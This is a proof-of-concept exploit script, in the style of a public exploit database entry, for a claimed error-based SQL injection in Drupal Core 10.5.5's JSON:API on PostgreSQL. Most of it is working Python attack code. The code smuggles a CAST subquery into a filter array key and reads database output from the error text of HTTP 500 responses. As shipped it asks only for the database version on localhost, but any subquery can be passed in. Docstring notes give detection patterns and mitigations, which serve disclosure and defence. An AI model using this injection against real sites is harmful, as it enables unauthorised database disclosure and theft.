# Exploit Title: Drupal Core 10.5.5 - Error-Based SQL Injection
# Google Dork: N/A
# Date: 2026-05-31
# Exploit Author: cardosource
# Vendor Homepage: https://www.drupal.org
# Software Link: https://www.drupal.org/project/drupal
# Version: Drupal Core 10.5.5
# Tested on: Debian Linux (Docker), PHP 8.2, Apache, PostgreSQL 17
# CVE: CVE-2026-9082
#
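# Description:
# This proof-of-concept demonstrates an error-based SQL injection in
# Drupal Core 10.5.5 (PostgreSQL). User-controlled JSON:API filter
# array keys influence SQL query construction, allowing database
# information disclosure through SQL error messages. The disclosure
# shown here depends on the server returning the database error text
# in the JSON:API error "detail" field of an HTTP 500 response, which
# is also the response pattern to look for in logs.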
import requests
import json
from urllib.parse import urlencode
# Endpoint the check is sent to. It points at a local instance
# (localhost:8080); the header above lists a Docker test setup.
TARGET_URL = "http://localhost:8080/jsonapi/node/article"

# Text printed once at start-up; it is only a label and has no effect on the request.
BANNER = (
    "\n"
    "[+] Drupal Core 10.5.5 - Error-Based SQL Injection\n"
    "[+] CVE-2026-9082\n"
    "[+] Target: JSON:API (PostgreSQL)\n"
)
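def extract_data(subquery):
    """Send one JSON:API filter request and print what the SQL error echoes back.

    The request is a GET to ``TARGET_URL`` with an ``IN`` filter on ``title``.
    ``subquery`` is interpolated, unescaped, into the *key* of the filter's
    ``value`` array. The key wraps the subquery in a cast to INTEGER, and the
    function then looks for the resulting ``invalid input syntax`` error.

    A result is reported only when all of the following hold:
      * the response status is 500,
      * the body is JSON with an ``errors`` list,
      * the first error's ``detail`` contains ``invalid input syntax``.

    Every other outcome is printed as an ``[INFO]``/``[ERROR]`` line, so a host
    that no longer reflects the error is distinguishable from one that could
    not be reached.

    Defender notes:
      * Request pattern: a ``filter[...][condition][value][<key>]`` parameter
        whose key is not a plain integer index. Legitimate clients would
        normally send numeric indexes here.
      * Response pattern: HTTP 500 from a ``/jsonapi/`` path whose error
        ``detail`` contains database error text.
      * Keeping database error text out of client responses removes the
        disclosure channel used here. It does not fix the query construction
        itself; that needs the vendor's fix for the CVE named in the header.

    Args:
        subquery: SQL text placed inside the cast expression.

    Returns:
        None. Results and diagnostics are printed.
    """
    headers = {
        "Accept": "application/vnd.api+json",
        "Content-Type": "application/vnd.api+json",
    }
    # The expression travels as an array key, not as a filter value.
    payload = f"0||CAST(({subquery}) AS INTEGER)"
    params = {
        "filter[my_filter][condition][path]": "title",
        "filter[my_filter][condition][operator]": "IN",
        "filter[my_filter][condition][value][0]": "Example",
        f"filter[my_filter][condition][value][{payload}]": "Injection",
    }

    try:
        response = requests.get(TARGET_URL, headers=headers, params=params, timeout=10)
    except requests.exceptions.RequestException as exc:
        # Previously swallowed; a connection failure looked the same as "no finding".
        print(f"[ERROR] request failed: {exc}")
        return

    if response.status_code != 500:
        print(f"[INFO] HTTP {response.status_code}: no database error in response")
        return

    try:
        body = response.json()
    except ValueError:
        # json.JSONDecodeError is a ValueError subclass, so decode failures land here.
        print("[INFO] HTTP 500 with a non-JSON body")
        return

    # Walk the JSON defensively: an empty "errors" list or an unexpected shape
    # would otherwise raise IndexError/AttributeError.
    errors = body.get("errors") if isinstance(body, dict) else None
    first = errors[0] if isinstance(errors, list) and errors else {}
    error = first.get("detail", "") if isinstance(first, dict) else ""
    if not isinstance(error, str):
        error = ""

    if "invalid input syntax" in error:
        # The first double-quoted segment of the error is taken as the echoed
        # value; without quotes the whole detail string is shown.
        data = error.split('"')[1] if '"' in error else error
        print(f"\033[92m[SUCCESS]\033[0m {data}")
    else:
        print("[INFO] HTTP 500 without the expected database error text")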
if __name__ == "__main__":
    # Script entry point: show the label, then run a single check that asks
    # only for the database server's version string.
    print(BANNER)
    version_query = "SELECT version()"
    extract_data(version_query)